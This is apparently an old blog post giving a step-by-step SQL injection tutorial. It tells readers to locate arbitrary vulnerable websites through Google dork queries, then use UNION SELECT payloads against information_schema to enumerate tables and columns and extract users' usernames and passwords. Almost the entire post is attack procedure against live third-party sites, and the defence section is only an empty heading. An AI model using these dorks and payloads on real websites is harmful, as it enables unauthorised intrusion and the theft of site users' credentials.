29 May 2013
SQL Injection how to
Injection Tutorial
Step 1. Search Google by typing in a dork and clicking one of the website that show up.
Common Dorks
inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.
So let's say we have a site like this
http://www.site.com/index.php?id=1
What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
http://www.site.com/index.php?id=1'
You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near line 1" or something.
Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has.
We use the "order by" function to do this.
http://www.site.com/index.php?id=1 order by 10
Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need
to use a number and not get any errors, then use the number right after the number we used and get an error.
So let's say we did:
order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)
What this means is that there are 8 columns.
Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract
data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select
function. After union select, write every number that leads to the number of columns, separated by a comma.
So here's how it should look:
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8
After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.
Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the
version of the database. We do this by using the @@version function.
http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8
Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show
up should either be 5.(some numbers) or 4.(some numbers).
For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the
group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We
use -- to execute our command.
http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--
Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for
anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones
are users, admin, members, staff, user, etc.
Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the
columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the
columns are within information_schema.columns this time.
After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after
.columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is
Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the
= equals sign.
So after all that it should look like this:
http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
where table_name=0x7573657273
The name of the columns should pop up on your screen.
Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we
will use the group_concat function.
Let's say that the column names that showed up were username,password. To extract the information, we put group_concat
(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of
a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should
look like this:
http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--
Now the usernames of people should show up, then a colon, then the passwords of the usernames.
For SQL Version 4 Injection:
For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the
table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or
admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow
the same steps for 5 afterwards.
Defend your website against SQL Injection
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment